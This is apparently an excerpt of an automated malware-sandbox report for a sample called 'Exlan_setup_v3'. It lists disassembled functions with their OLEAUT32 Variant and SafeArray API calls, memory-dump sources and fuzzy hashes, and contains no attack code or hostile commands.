String ID: p<^q$p<^q$p<^q$p<^q$Gvq$Gvq$Gvq$Gvq$Gvq
API String ID: 0-2894213923
Opcode ID: bd885e151522eac313a679f0214af95a33e2e6d79fb8e466bd0dffd32c515569
Instruction ID: 0c58ac9194ae93c7e38e436f5f146f036c6a60a62333c1cb7d6e503d672430e2
Opcode Fuzzy Hash: bd885e151522eac313a679f0214af95a33e2e6d79fb8e466bd0dffd32c515569
Instruction Fuzzy Hash: D2324B74A0011A8FEB54DB64CD94BAAF7B2BF88314F15C295D80DAB395DB34DD82CB90

Function 05801844 Relevance: 5.4, Strings: 4, Instructions: 396COMMON

Download Yara Rule

Strings

p<^q, xrefs: 05801946
p<^q, xrefs: 0580196C
p<^q, xrefs: 05801960
p<^q, xrefs: 0580193A

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID: p<^q$p<^q$p<^q$p<^q
API String ID: 0-2395080126
Opcode ID: 6ad50d3b6bf0aec98614db677b7ca3518fcc82df7161a4d2f3e4a22136f7d7f0
Instruction ID: 41c30c8ee4505a45ff71aeb44a63cea2020de4c4144d6eb423077e3c5d6d786a
Opcode Fuzzy Hash: 6ad50d3b6bf0aec98614db677b7ca3518fcc82df7161a4d2f3e4a22136f7d7f0
Instruction Fuzzy Hash: 4CF17D75B002198FDB54CB68CD94B6EB7F2BF88314F1581A9D80AAB395DB34DD42CB81

Function 6CFC2970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CFC29F6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CFC2A08
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CFC2A2F
VariantInit.OLEAUT32(?), ref: 6CFC2ABB
VariantInit.OLEAUT32(?), ref: 6CFC2B3F
VariantClear.OLEAUT32(?), ref: 6CFC2C04
VariantClear.OLEAUT32(?), ref: 6CFC2C0B
VariantClear.OLEAUT32(?), ref: 6CFC2C12
VariantClear.OLEAUT32(?), ref: 6CFC2C96
VariantClear.OLEAUT32(?), ref: 6CFC2C9D
VariantClear.OLEAUT32(?), ref: 6CFC2CD6
VariantClear.OLEAUT32(?), ref: 6CFC2CDD
VariantClear.OLEAUT32(?), ref: 6CFC2CE4
SafeArrayDestroy.OLEAUT32(?), ref: 6CFC2D1B
VariantClear.OLEAUT32(?), ref: 6CFC2D45
VariantClear.OLEAUT32(?), ref: 6CFC2D4C
VariantClear.OLEAUT32(?), ref: 6CFC2D53

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
String ID:
API String ID: 214056513-0
Opcode ID: 45cd6c6a336207869e6d18e27b7a3851615af2f6764018e5e1a9bb29512f8357
Instruction ID: 8cb83151f5a5b932bd959cfc6cc8341f810a0eb4f99bffc5fa5bf83954b6ca76
Opcode Fuzzy Hash: 45cd6c6a336207869e6d18e27b7a3851615af2f6764018e5e1a9bb29512f8357
Instruction Fuzzy Hash: CEC138717083429FD700CFA8C888A5BBBF9EB99304F20895DF695C7260C776E945CB52

Function 6CFBAF30 Relevance: 22.8, APIs: 15, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CFBAF75
VariantInit.OLEAUT32(?), ref: 6CFBAF7C
VariantInit.OLEAUT32(?), ref: 6CFBAF83
VariantCopy.OLEAUT32(?,?), ref: 6CFBB00D
VariantClear.OLEAUT32(?), ref: 6CFBB027
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CFBB19C
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CFBB1AA
SafeArrayAccessData.OLEAUT32(?,?), ref: 6CFBB1C5
SafeArrayUnaccessData.OLEAUT32(?), ref: 6CFBB1EF
VariantClear.OLEAUT32(?), ref: 6CFBB237
VariantClear.OLEAUT32(?), ref: 6CFBB23E
VariantClear.OLEAUT32(?), ref: 6CFBB245
VariantClear.OLEAUT32(?), ref: 6CFBB29D
VariantClear.OLEAUT32(?), ref: 6CFBB2A4
VariantClear.OLEAUT32(?), ref: 6CFBB2AB

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess
String ID:
API String ID: 1795507694-0
Opcode ID: 41c70e53ce382b899e5a1b9dadae1f51e91aeeb9d7bfe6d0968a910590acb45d
Instruction ID: 951ac1ea18216a516d5ff97ec0506d5d14dbd96cc08a7c9aadf88b47c0044613
Opcode Fuzzy Hash: 41c70e53ce382b899e5a1b9dadae1f51e91aeeb9d7bfe6d0968a910590acb45d
Instruction Fuzzy Hash: 19C156B2608341AFD700DFA9C8C4A5BB7E9FB89304F158A6DF659D7250D730E905CBA2

Function 6CFCD410 Relevance: 22.8, APIs: 15, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CFCD4B3
VariantInit.OLEAUT32 ref: 6CFCD4C5
VariantInit.OLEAUT32(?), ref: 6CFCD4CC
_malloc.LIBCMT ref: 6CFCD551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CFCD58B
SafeArrayCreateVector.OLEAUT32 ref: 6CFCD5A6
SafeArrayAccessData.OLEAUT32 ref: 6CFCD5B8

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
String ID:
API String ID: 1552365394-0
Opcode ID: 951a9f7968331fae0c416fbbe5f94b9973b9fa115d53ad383685859e1104be76
Instruction ID: d4abfa00fdf2683df8099142d324de1f72da56aea167db45e9d2b662e06e21a4
Opcode Fuzzy Hash: 951a9f7968331fae0c416fbbe5f94b9973b9fa115d53ad383685859e1104be76
Instruction Fuzzy Hash: EFB13476608301AFD314CF28C880A5BB7F9FF89318F14895DE99997791E731E905CB92

Function 6CFC44C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CFC44FF
VariantInit.OLEAUT32(?), ref: 6CFC4505
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CFC4516
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CFC4551
VariantClear.OLEAUT32(?), ref: 6CFC455A
SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CFC4579
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CFC4594
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CFC45B5
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CFC45CE
std::tr1::_Xweak.LIBCPMT ref: 6CFC475A
SafeArrayDestroy.OLEAUT32(?), ref: 6CFC4777
VariantClear.OLEAUT32(?), ref: 6CFC4787
VariantClear.OLEAUT32(?), ref: 6CFC478D

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
String ID:
API String ID: 1304965753-0
Opcode ID: de8b0bfd38d37855779610adb90278a936dc29440a75a8eb33af12aee74eebb7
Instruction ID: d6012f9cd434e0f086296e729a81d86a43a24381fa1b585bcff2190fcbd2964d
Opcode Fuzzy Hash: de8b0bfd38d37855779610adb90278a936dc29440a75a8eb33af12aee74eebb7
Instruction Fuzzy Hash: 7CA12B75A05206ABDB14DBA4C984EAFB7B9BF8C710F14462DE506ABB81C631E941CF60

Function 6CFC5140 Relevance: 19.7, APIs: 13, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CFC5177

Part of subcall function 6CFD2820: _malloc.LIBCMT ref: 6CFD2871

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6CFC51B9
SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CFC51D5
SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6CFC51E5
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CFC5208
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CFC522C
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CFC5263
VariantClear.OLEAUT32(?), ref: 6CFC526C
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CFC52AD
VariantClear.OLEAUT32(?), ref: 6CFC52B6
SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6CFC52D2
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFC534E
VariantClear.OLEAUT32(?), ref: 6CFC5358

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc
String ID:
API String ID: 4170690753-0
Opcode ID: 2fa6a7f4aca9b4187b28556d45188595b37adb1a611602b819e544ddf2de9acc
Instruction ID: 670db4638a469870cb0d5e124bee36a3d926bf221476b55aacb07b6f624a9d88
Opcode Fuzzy Hash: 2fa6a7f4aca9b4187b28556d45188595b37adb1a611602b819e544ddf2de9acc
Instruction Fuzzy Hash: 0C7128B1A0121AEBDB00CFA5C885BAFBBB9FF59304F108119E915E7240E774E945CBA1

Function 6CFCBF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CFCBF3D
VariantInit.OLEAUT32(?), ref: 6CFCBF4A
VariantInit.OLEAUT32(?), ref: 6CFCBF50
VariantInit.OLEAUT32(?), ref: 6CFCBF56
VariantInit.OLEAUT32 ref: 6CFCC04D
VariantCopy.OLEAUT32(?,?), ref: 6CFCC054
VariantInit.OLEAUT32 ref: 6CFCC085
VariantCopy.OLEAUT32(?,?), ref: 6CFCC08C
VariantClear.OLEAUT32(?), ref: 6CFCC118
VariantClear.OLEAUT32(?), ref: 6CFCC11E
VariantClear.OLEAUT32(?), ref: 6CFCC124
VariantClear.OLEAUT32(?), ref: 6CFCC12A

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 72649c67be1ba8fcfb27ef4f75a2e79af39b883e786b6825364b5c9af48727f9
Instruction ID: 9992aa9cdacaebf3356cdb5406b6cf3632e943358313bad44a23507e073ef409
Opcode Fuzzy Hash: 72649c67be1ba8fcfb27ef4f75a2e79af39b883e786b6825364b5c9af48727f9
Instruction Fuzzy Hash: F4819C71A0121AAFDB04EFA8C880FEEBBB9FF49308F144559E905E7740DB35A905CB91

Function 6CFC64D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CFC650C
VariantInit.OLEAUT32(?), ref: 6CFC6519
VariantInit.OLEAUT32(?), ref: 6CFC6520
SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6CFC6531
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFC656D
VariantClear.OLEAUT32(?), ref: 6CFC6576
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFC65B6
VariantClear.OLEAUT32(?), ref: 6CFC65BF
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFC6666
VariantClear.OLEAUT32(?), ref: 6CFC6677
VariantClear.OLEAUT32(?), ref: 6CFC667E
VariantClear.OLEAUT32(?), ref: 6CFC6685

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: d3098e1ee888c31098b0a4b3d9247231536cd01bf48d9f0a20f784cd9ed94e5e
Instruction ID: 1f203fa51a648e457eec6b249b80d3a0e5f8fda747ac27b7b7ca8eee64805681
Opcode Fuzzy Hash: d3098e1ee888c31098b0a4b3d9247231536cd01bf48d9f0a20f784cd9ed94e5e
Instruction Fuzzy Hash: 3C512772209706AFC700DF64C880A6BBBF8EFD9714F108A1DF95597250DB71E9058B92

Function 6CFCCB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CFCCBCA
VariantInit.OLEAUT32(?), ref: 6CFCCBD3
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CFCCBE4
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CFCCBF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFCCC0D
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CFCCC39
VariantClear.OLEAUT32(?), ref: 6CFCCC42
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CFCCC5D
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CFCCC77
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFCCCEC
VariantClear.OLEAUT32(?), ref: 6CFCCCFC
VariantClear.OLEAUT32(?), ref: 6CFCCD02

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
String ID:
API String ID: 3548156019-0
Opcode ID: 257960e67b43822f283aae0ad1ce845ee95ec294ce887955d8af5593ea0c8b2c
Instruction ID: 79c73404a269b3ee24a3cc172df10555699d4478e491ca32110c4428d5d51889
Opcode Fuzzy Hash: 257960e67b43822f283aae0ad1ce845ee95ec294ce887955d8af5593ea0c8b2c
Instruction Fuzzy Hash: AE515275E0424AAFDB00DFA8C881EDFBBB8FF49714F10815AEA15A7341D770A945CBA0

Function 6CFBA350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CFBA393
VariantInit.OLEAUT32(?), ref: 6CFBA39A
VariantInit.OLEAUT32(?), ref: 6CFBA3A1
VariantCopy.OLEAUT32(?,?), ref: 6CFBA3EF
VariantClear.OLEAUT32(?), ref: 6CFBA409
VariantClear.OLEAUT32(?), ref: 6CFBA50A
VariantClear.OLEAUT32(?), ref: 6CFBA511
VariantClear.OLEAUT32(?), ref: 6CFBA518
VariantClear.OLEAUT32(?), ref: 6CFBA55E
VariantClear.OLEAUT32(?), ref: 6CFBA565
VariantClear.OLEAUT32(?), ref: 6CFBA56C

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Clear$Init$Copy
String ID:
API String ID: 3214764494-0
Opcode ID: cfc8016e42d930851a9bf3ab545fc98a519963e0ee78232d1fcc04b1b78e1442
Instruction ID: 001214745b214ead5a36832efa5c073e848f70646eacfa6a0dde969da245e8c2
Opcode Fuzzy Hash: cfc8016e42d930851a9bf3ab545fc98a519963e0ee78232d1fcc04b1b78e1442
Instruction Fuzzy Hash: E57139726083419FD300DF69C980A5BB7E8FF89714F108A6DFA59DB291DB31E904CB62

Function 6CFCCD20 Relevance: 15.5, APIs: 10, Instructions: 485
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CFCCD5C
VariantInit.OLEAUT32(?), ref: 6CFCCD65
VariantInit.OLEAUT32(?), ref: 6CFCCD6B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFCCD76
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFCCDAA
VariantClear.OLEAUT32(?), ref: 6CFCCDB7
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFCD2A5
VariantClear.OLEAUT32(?), ref: 6CFCD2B5
VariantClear.OLEAUT32(?), ref: 6CFCD2BB
VariantClear.OLEAUT32(?), ref: 6CFCD2C1

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: dcc0e4aed2f1d5a8f7289a5299e2ba87605e36c15bae0704f9e6965351d016de
Instruction ID: 41ab29e39b658fa8b24e8e794b78ea1419faa743eadb3e71f76e1333017e714f
Opcode Fuzzy Hash: dcc0e4aed2f1d5a8f7289a5299e2ba87605e36c15bae0704f9e6965351d016de
Instruction Fuzzy Hash: 5412F575A15706AFC718DB98DD84DAAB3B9BF8D300F14466CF50AABB91CA30F841CB50

Function 6CFC66A0 Relevance: 15.2, APIs: 10, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CFC66DB
VariantInit.OLEAUT32 ref: 6CFC66EA
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CFC6700
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFC673A
VariantClear.OLEAUT32(?), ref: 6CFC6747
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFC6787
VariantClear.OLEAUT32(?), ref: 6CFC6794
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFC6849
VariantClear.OLEAUT32(?), ref: 6CFC685A
VariantClear.OLEAUT32(?), ref: 6CFC6861

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
String ID:
API String ID: 551789342-0
Opcode ID: 6336846940b85b27ed69e1d044964fab2d622288432992b5edb1620b04784f32
Instruction ID: 991cef92685a993369386d8c77dfe3bf2d1eeed7802beb6cc9b66461a671847b
Opcode Fuzzy Hash: 6336846940b85b27ed69e1d044964fab2d622288432992b5edb1620b04784f32
Instruction Fuzzy Hash: 0A516C76209206AFC700CF64C844BABBBF9EFD9714F118A59F944DB290D730E905CBA2

Function 6CFC4170 Relevance: 13.8, APIs: 9, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CFC41AF
VariantInit.OLEAUT32(?), ref: 6CFC41B5
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFC41C0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CFC41F5
VariantClear.OLEAUT32(?), ref: 6CFC4201
